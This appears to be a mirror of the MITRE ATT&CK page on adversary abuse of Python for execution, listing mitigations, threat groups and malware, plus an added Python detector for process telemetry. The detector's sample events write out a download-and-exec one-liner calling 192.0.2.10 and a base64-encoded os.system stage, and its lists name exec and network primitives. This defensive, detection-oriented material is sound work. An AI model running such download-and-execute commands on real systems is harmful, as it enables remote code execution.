Description
Adversaries may abuse Python commands and scripts for execution. Python is a widely used scripting/programming language with the capability to perform many functions. Python can be executed interactively from the command line (via the python.exe interpreter on Windows, or python/python3 on Linux and macOS) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into stand-alone binary executables (for example with PyInstaller), which carry their own embedded runtime and therefore run on hosts that have no interpreter installed.(Citation: Zscaler APT31 Covid-19 October 2020)
Python ships with a large standard library for interacting with the underlying system, covering file operations, networking, process creation and device I/O. Adversaries can use these modules to download and execute commands or additional scripts, as well as perform a wide range of other malicious behaviors.
Platforms
Linux, macOS, Windows
Mitigations (4)
| ID | Mitigation | Description |
|---|---|---|
| M1047 | Audit | Inventory systems for unauthorized Python installations. |
| M1049 | Antivirus/Antimalware | Anti-virus can be used to automatically quarantine suspicious files. |
| M1033 | Limit Software Installation | Prevent users from installing Python where not required. |
| M1038 | Execution Prevention | Denylist Python where not required. |
Note that a denylist aimed at the interpreter binary does not cover Python compiled into a stand-alone executable (see the PyInstaller-packed DropBook entry below): such a binary embeds its own runtime and never invokes python.exe.
Threat Groups (18)
| ID | Group | Context |
|---|---|---|
| G0067 | APT37 | [APT37](https://attack.mitre.org/groups/G0067) has used Python scripts to execute payloads.(Citation: Volexity InkySquid RokRAT August 2021) |
| G0060 | BRONZE BUTLER | [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has made use of Python-based remote access tools.(Citation: Trend Micro Tick November 2019) |
| G0131 | Tonto Team | [Tonto Team](https://attack.mitre.org/groups/G0131) has used Python-based tools for execution.(Citation: TrendMicro Tonto Team October 2020) |
| G0128 | ZIRCONIUM | [ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used Python-based implants to interact with compromised hosts.(Citation: Google Election Threat... |
| G0106 | Rocke | [Rocke](https://attack.mitre.org/groups/G0106) has used Python-based malware to install and spread their coinminer.(Citation: Anomali Rocke March 2019... |
| G0095 | Machete | [Machete](https://attack.mitre.org/groups/G0095) used multiple compiled Python scripts on the victim’s system. [Machete](https://attack.mitre.org/grou... |
| G1048 | UNC3886 | [UNC3886](https://attack.mitre.org/groups/G1048) has used Python scripts to enumerate ESXi hosts and guest VMs.(Citation: Google Cloud Threat Intellig... |
| G1006 | Earth Lusca | [Earth Lusca](https://attack.mitre.org/groups/G1006) used Python scripts for port scanning or building reverse shells.(Citation: TrendMicro EarthLusca... |
| G0069 | MuddyWater | [MuddyWater](https://attack.mitre.org/groups/G0069) has developed tools in Python including [Out1](https://attack.mitre.org/software/S0594).(Citation:... |
| G1052 | Contagious Interview | [Contagious Interview](https://attack.mitre.org/groups/G1052) has used the Python-based malware such as [InvisibleFerret](https://attack.mitre.org/sof... |
| G1021 | Cinnamon Tempest | [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) has used a customized version of the [Impacket](https://attack.mitre.org/software/S0357) wmi... |
| G0010 | Turla | [Turla](https://attack.mitre.org/groups/G0010) has used IronPython scripts as part of the [IronNetInjector](https://attack.mitre.org/software/S0581) t... |
| G0016 | APT29 | [APT29](https://attack.mitre.org/groups/G0016) has developed malware variants written in Python.(Citation: Symantec Seaduke 2015) |
| G0087 | APT39 | [APT39](https://attack.mitre.org/groups/G0087) has used a command line utility and a network scanner written in python.(Citation: BitDefender Chafer M... |
| G1039 | RedCurl | [RedCurl](https://attack.mitre.org/groups/G1039) has used a Python script to establish outbound communication and to execute commands using SMB port 4... |
| G1055 | VOID MANTICORE | [VOID MANTICORE](https://attack.mitre.org/groups/G1055) has utilized Python scripts to execute its malicious payloads.(Citation: FBI IC3 Flash VOID MA... |
| G0035 | Dragonfly | [Dragonfly](https://attack.mitre.org/groups/G0035) has used various types of scripting to perform operations, including Python scripts. The group was ... |
| G0094 | Kimsuky | [Kimsuky](https://attack.mitre.org/groups/G0094) has used a macOS Python implant to gather data as well as MailFetcher.py code to automatically collec... |
Associated Software (37)
| ID | Name | Type | Context |
|---|---|---|---|
| S0581 | IronNetInjector | Tool | [IronNetInjector](https://attack.mitre.org/software/S0581) can use IronPython scripts to load payloads with the help of a .NET injector.(Citation: Uni... |
| S0547 | DropBook | Malware | [DropBook](https://attack.mitre.org/software/S0547) is a Python-based backdoor compiled with PyInstaller.(Citation: Cybereason Molerats Dec 2020) |
| S1218 | VIRTUALPIE | Malware | [VIRTUALPIE](https://attack.mitre.org/software/S1218) is a Python-based backdoor malware.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)(C... |
| S0196 | PUNCHBUGGY | Malware | [PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used python scripts.(Citation: Morphisec ShellTea June 2019) |
| S0695 | Donut | Tool | [Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via Python.(Citation: Donut Github) |
| S0681 | Lizar | Malware | [Lizar](https://attack.mitre.org/software/S0681) has used Python scripts (ps2x.py script and ps2p.py) to execute files on remote hosts using the [Impa... |
| S1217 | VIRTUALPITA | Malware | [VIRTUALPITA](https://attack.mitre.org/software/S1217) can call a Python script to run commands on a targeted guest virtual machine.(Citation: Google ... |
| S0374 | SpeakUp | Malware | [SpeakUp](https://attack.mitre.org/software/S0374) uses Python scripts.(Citation: CheckPoint SpeakUp Feb 2019) |
| S1187 | reGeorg | Malware | [reGeorg](https://attack.mitre.org/software/S1187) is a Python-based web shell.(Citation: GitHub reGeorg 2016) |
| S1032 | PyDCrypt | Malware | [PyDCrypt](https://attack.mitre.org/software/S1032), along with its functions, is written in Python.(Citation: Checkpoint MosesStaff Nov 2021) |
| S0583 | Pysa | Malware | [Pysa](https://attack.mitre.org/software/S0583) has used Python scripts to deploy ransomware.(Citation: CERT-FR PYSA April 2020) |
| S0387 | KeyBoy | Malware | [KeyBoy](https://attack.mitre.org/software/S0387) uses Python scripts for installing files and performing execution.(Citation: CitizenLab KeyBoy Nov 2... |
| S0332 | Remcos | Tool | [Remcos](https://attack.mitre.org/software/S0332) uses Python scripts.(Citation: Riskiq Remcos Jan 2018) |
| S1189 | Neo-reGeorg | Malware | [Neo-reGeorg](https://attack.mitre.org/software/S1189) is a Python-based web shell.(Citation: GitHub Neo-reGeorg 2019) |
| S9024 | SPAWNCHIMERA | Malware | [SPAWNCHIMERA](https://attack.mitre.org/software/S9024) has searched the contents of two Python files scanner.py and scanner_legacy.py by searching fo... |
| S0482 | Bundlore | Malware | [Bundlore](https://attack.mitre.org/software/S0482) has used Python scripts to execute payloads.(Citation: MacKeeper Bundlore Apr 2019) |
| S1035 | Small Sieve | Malware | [Small Sieve](https://attack.mitre.org/software/S1035) can use Python scripts to execute commands.(Citation: NCSC GCHQ Small Sieve Jan 2022) |
| S1223 | THINCRUST | Malware | [THINCRUST](https://attack.mitre.org/software/S1223) can use Python scripts for command execution.(Citation: Mandiant Fortinet Zero Day) |
| S0692 | SILENTTRINITY | Tool | [SILENTTRINITY](https://attack.mitre.org/software/S0692) is written in Python and can use multiple Python scripts for execution on targeted systems.(C... |
| S0631 | Chaes | Malware | [Chaes](https://attack.mitre.org/software/S0631) has used Python scripts for execution and the installation of additional files.(Citation: Cybereason ... |
Frequently Asked Questions
What is T1059.006 (Python)?
T1059.006 is the MITRE ATT&CK sub-technique named 'Python' under Command and Scripting Interpreter (T1059); it belongs to the Execution tactic. Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactiv...
How can T1059.006 be detected?
Detection of T1059.006 (Python) relies mainly on process and command-line telemetry. Monitor process creation (for example Sysmon Event ID 1 on Windows, auditd execve records or EDR sensors on Linux and macOS) for python, python3, pythonw, py.exe and similar interpreter images, and inspect their arguments for inline code (-c), module invocations (-m), scripts launched from temporary or user-writable directories, and encoded payloads. Correlate parent and child processes: an interpreter spawning cmd.exe, sh or bash, or being spawned by an Office application, browser or web server, warrants investigation. Because compiled Python binaries (PyInstaller, py2exe) do not show the interpreter as the process image, also watch for non-interpreter processes loading the CPython runtime library (python3xx.dll, libpython) and for PyInstaller's _MEI temporary extraction directories. Python has no equivalent of PowerShell script block logging, so network connections from interpreter processes and the script files themselves (via file-creation events) are the remaining sources. Feed these into SIEM rules and behavioral analytics, and baseline legitimate Python use (build systems, administration scripts) to keep false positives manageable.
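The following is an added example, not code from MITRE ATT&CK or from this page's source, that turns the execution forms in the technique description (interactive -c one-liners, distributed .py scripts, compiled binaries) and the detection answer above into runnable logic over process-creation events. The ProcessEvent shape, field names, staging-directory list, base64-run threshold and every sample event are constructed assumptions; 192.0.2.10 is a documentation address. Tune the heuristics to your environment before using them as rules.

```python
"""Flag T1059.006 (Python) execution patterns in process-creation telemetry.

Added example, not code from MITRE ATT&CK or this page's source. The event
shape, field names, sample events and thresholds are constructed assumptions.
"""
from __future__ import annotations

import base64
import re
import shlex
from dataclasses import dataclass

# Interpreter images on Windows, Linux and macOS: python, pythonw, python3,
# python3.11, python.exe, pythonw.exe and the py.exe launcher.
PYTHON_IMAGE = re.compile(r"(^|[\\/])(python(w)?\d*(\.\d+)?|py)(\.exe)?$", re.IGNORECASE)
SHELL_IMAGE = re.compile(r"(^|[\\/])(cmd\.exe|powershell\.exe|pwsh(\.exe)?|sh|bash|zsh)$", re.IGNORECASE)
# CPython runtime library that a compiled or bundled Python program must load.
PYTHON_RUNTIME = re.compile(r"(^|[\\/])(python\d+\.dll|libpython[\d.]*\.(so|dylib)[\d.]*)$", re.IGNORECASE)
# PyInstaller one-file bundles unpack into a temp dir named _MEI<digits> at start-up.
PYINSTALLER_TMP = re.compile(r"[\\/]_MEI\d+[\\/]", re.IGNORECASE)
# A long base64 run or a run of \x escapes inside an inline program (threshold is an assumption).
ENCODED_BLOB = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}|(\\x[0-9a-fA-F]{2}){8,}")

# Standard-library primitives that turn the interpreter into a downloader, loader or launcher.
SUSPICIOUS_PRIMITIVES = (
    "urllib", "http.client", "socket", "ftplib", "requests",
    "subprocess", "os.system", "os.popen", "pty.spawn", "ctypes",
    "exec(", "eval(", "compile(", "__import__(",
    "base64", "marshal", "zlib",
)
# Staging directories where dropped scripts typically land (compared lower-cased, forward slashes).
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/appdata/local/temp/",
                "/downloads/", "/users/public/", "/programdata/")


@dataclass(frozen=True)
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str
    loaded_modules: tuple[str, ...] = ()  # image-load events correlated to this process


def _argv(command_line: str) -> list[str]:
    # Non-POSIX splitting keeps Windows backslashes; fall back if quotes are unbalanced.
    try:
        return shlex.split(command_line, posix=False)
    except ValueError:
        return command_line.split()


def analyze(event: ProcessEvent) -> list[str]:
    """Return the T1059.006 indicators matched by one event, in rule order (empty if none)."""
    reasons: list[str] = []
    argv = _argv(event.command_line)
    lowered = event.command_line.lower()
    is_python = bool(PYTHON_IMAGE.search(event.image))

    if is_python:
        inline = "-c" in argv  # interactive one-liner rather than a script file
        if inline and any(p in lowered for p in SUSPICIOUS_PRIMITIVES):
            reasons.append("inline_code_uses_network_or_exec_primitive")
        for arg in argv[1:]:
            path = arg.strip("'\"").replace("\\", "/").lower()
            if path.endswith((".py", ".pyc", ".pyw", ".pyz")) and any(d in path for d in STAGING_DIRS):
                reasons.append("script_in_temp_or_user_writable_path")
                break
        if inline and ENCODED_BLOB.search(event.command_line):
            reasons.append("encoded_payload_in_command_line")
    elif SHELL_IMAGE.search(event.image) and PYTHON_IMAGE.search(event.parent_image):
        reasons.append("shell_spawned_by_python")  # subprocess/os.system handing off to a shell

    if not is_python and any(PYTHON_RUNTIME.search(m) for m in event.loaded_modules):
        reasons.append("python_runtime_loaded_by_non_interpreter")  # compiled/bundled Python
    if any(PYINSTALLER_TMP.search(m) for m in event.loaded_modules):
        reasons.append("pyinstaller_onefile_extraction")
    return reasons


def decode_encoded_blob(command_line: str) -> str | None:
    """Decode the first base64 run in an inline program for triage; None if absent or invalid."""
    for m in ENCODED_BLOB.finditer(command_line):
        blob = m.group(0)
        if blob.startswith("\\x"):
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:
            continue
    return None


# Constructed sample telemetry (192.0.2.10 is a documentation address; nothing here is real).
SAMPLE_EVENTS = {
    "download_and_exec": ProcessEvent(
        r"C:\Python311\python.exe",
        'python.exe -c "import urllib.request;exec(urllib.request.urlopen(\'http://192.0.2.10/s.py\').read())"',
        r"C:\Windows\System32\cmd.exe"),
    "encoded_stage": ProcessEvent(  # blob is base64 of the constructed one-liner import os;os.system('id')
        "/usr/bin/python3",
        "python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IG9zO29zLnN5c3RlbSgnaWQnKQ=='))\"",
        "/bin/bash"),
    "staged_script": ProcessEvent("/usr/bin/python3", "/usr/bin/python3 /tmp/.x/update.py", "/bin/bash"),
    "python_to_shell": ProcessEvent("/bin/sh", 'sh -c "id; uname -a"', "/usr/bin/python3"),
    "bundled_binary": ProcessEvent(
        r"C:\Users\alice\Downloads\invoice.exe", r'"C:\Users\alice\Downloads\invoice.exe"',
        r"C:\Windows\explorer.exe",
        (r"C:\Users\alice\AppData\Local\Temp\_MEI52362\python311.dll",)),
    "benign_test_run": ProcessEvent(r"C:\Python311\python.exe", "python.exe -m pytest tests",
                                    r"C:\Windows\System32\cmd.exe"),
}


def report(events: dict[str, ProcessEvent] = SAMPLE_EVENTS) -> dict[str, list[str]]:
    """Map each event label to its matched indicators."""
    return {label: analyze(ev) for label, ev in events.items()}


if __name__ == "__main__":
    for label, reasons in report().items():
        print(f"{label:18} {reasons or 'no indicators'}")
```

The rules deliberately treat a plain interpreter launch as benign: the signal is in the combination of an inline program with network, decode or spawn primitives, a script staged in a writable directory, an interpreter as the parent of a shell, or a non-interpreter image loading the CPython runtime, which is how a PyInstaller-packed sample such as DropBook would surface. decode_encoded_blob is for analyst triage of the encoded_payload finding, not for automatic execution of what it recovers.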
What mitigations exist for T1059.006?
There are 4 documented mitigations for T1059.006. Key mitigations include: Audit, Antivirus/Antimalware, Limit Software Installation, Execution Prevention.
Which threat groups use T1059.006?
Known threat groups using T1059.006 include: APT37, BRONZE BUTLER, Tonto Team, ZIRCONIUM, Rocke, Machete, UNC3886, Earth Lusca.